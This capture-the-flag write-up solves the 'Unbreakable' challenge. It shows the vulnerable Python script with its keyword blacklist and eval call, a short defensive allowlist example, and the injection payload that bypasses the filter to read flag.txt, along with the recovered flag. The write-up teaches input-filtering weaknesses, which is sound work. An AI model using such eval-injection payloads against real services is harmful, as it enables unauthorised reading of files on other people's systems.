Unbreakable

Personal Rating: Easy

We have a netcat interface that we can use to send commands. We need to bypass a filter to execute Python code to read the flag in the same folder as the script. I cleaned it up a little:

#!/usr/bin/python3

banner1 = 'banner1'
banner2 = 'banner2'

blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
              ' ', '-', '!', '[', ']', '*', 'import',
              'eval', 'banner', 'echo', 'cat', '%',
              '&', '>', '<', '+', '1', '2', '3', '4',
              '5', '6', '7', '8', '9', '0', 'b', 's',
              'lower', 'upper', 'system', '}', '{' ]

while True:
  ans = input('Break me, shake me!\n\n$ ').strip()

  if any(char in ans for char in blacklist):
    print(f'\n{banner1}\nNaughty naughty..\n')
  else:
    try:
      eval(ans + '()')
      print('WHAT WAS THAT?!\n')
    except:
      print(f"\n{banner2}\nI'm UNBREAKABLE!\n")

Our command gets any leading or trailing spaces removed.

Then the blacklist is applied.

If the blacklist did not block it, () is appended to the answer and the result is passed to eval, which executes it if it's valid Python code.
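To make the filter mechanics concrete, here is an added example (not the challenge's own code) that replays the challenge's substring denylist and sets it beside a hypothetical AST-based allowlist, which is how a defender would replace "denylist plus eval": only a bare identifier found in an explicit table may be called, so comments, attribute access and nested calls are rejected structurally rather than by string matching. The names ALLOWED, passes_blacklist, allowed_name and safe_call are assumptions for this example.

```python
import ast

# Denylist copied from the challenge script, checked as plain substrings.
BLACKLIST = [';', '"', 'os', '_', '\\', '/', '`', ' ', '-', '!', '[', ']', '*',
             'import', 'eval', 'banner', 'echo', 'cat', '%', '&', '>', '<', '+',
             '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'b', 's',
             'lower', 'upper', 'system', '}', '{']


def passes_blacklist(ans: str) -> bool:
    """Same check the challenge applies: strip(), then any substring hit rejects."""
    ans = ans.strip()
    return not any(token in ans for token in BLACKLIST)


# Hypothetical replacement: an explicit table of callables the user may invoke.
ALLOWED = {'hello': lambda: 'hi'}


def allowed_name(ans: str):
    """Parse the input as an expression and accept only a bare Name in ALLOWED.

    ast.parse drops a trailing '#...' comment, so 'hello#' still resolves to
    'hello'; anything else (Call, Attribute, Subscript, ...) returns None.
    """
    try:
        tree = ast.parse(ans.strip(), mode='eval')
    except SyntaxError:
        return None
    node = tree.body
    if isinstance(node, ast.Name) and node.id in ALLOWED:
        return node.id
    return None


def safe_call(ans: str):
    """Call the allow-listed function, or return None if the input is rejected."""
    name = allowed_name(ans)
    return None if name is None else ALLOWED[name]()
```

The first function shows why the denylist lets the writeup's payload through (none of its substrings appear in it), while the allowlist rejects the same payload because its AST root is a Call, not a Name.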

This seems to work so far, but it does not yet output the flag:

$ open('flag.txt','r').read
WHAT WAS THAT?!
$ print(open('flag.txt','r').read)#
<built-in method read of _io.TextIOWrapper object at 0x7f1d4ad1f5e0>
WHAT WAS THAT?!

Turns out this prints the read method object itself instead of calling it: the trailing # comments out the () that the script appends, so read is never invoked.

This worked:

$ print(open('flag.txt','r').read())#
HTB{3v4l_0r_3vuln??}

HTB{3v4l_0r_3vuln??}
